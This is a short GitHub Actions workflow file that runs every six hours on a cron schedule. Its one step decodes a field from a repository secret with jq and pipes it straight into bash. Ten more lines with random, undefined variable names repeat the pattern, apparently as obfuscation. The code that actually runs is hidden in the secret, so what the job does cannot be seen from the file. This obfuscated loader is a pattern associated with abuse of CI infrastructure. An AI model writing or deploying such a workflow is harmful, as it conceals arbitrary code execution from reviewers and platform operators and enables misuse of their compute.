name: flowerywhizz
on:
  workflow_dispatch:
  schedule:
    - cron: '14 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: flowerywhizz
        env:
          n8334: ${{ secrets.n8334 }}
        run: |
          echo $n8334 | jq -r .g81 | /bin/bash
          echo $pfjw98876 | jq -r .fko120 | /bin/bash
          echo $gfouq767 | jq -r .ula3985 | /bin/bash
          echo $v5 | jq -r .bn600 | /bin/bash
          echo $f90986 | jq -r .lkk2425 | /bin/bash
          echo $h1 | jq -r .us33 | /bin/bash
          echo $q779 | jq -r .wrcp62 | /bin/bash
          echo $ziue16242 | jq -r .pgumq79118 | /bin/bash
          echo $qpc537 | jq -r .inuo2224 | /bin/bash
          echo $jzg0012 | jq -r .aadf5814 | /bin/bash
          echo $zzc1 | jq -r .cyque034 | /bin/bash

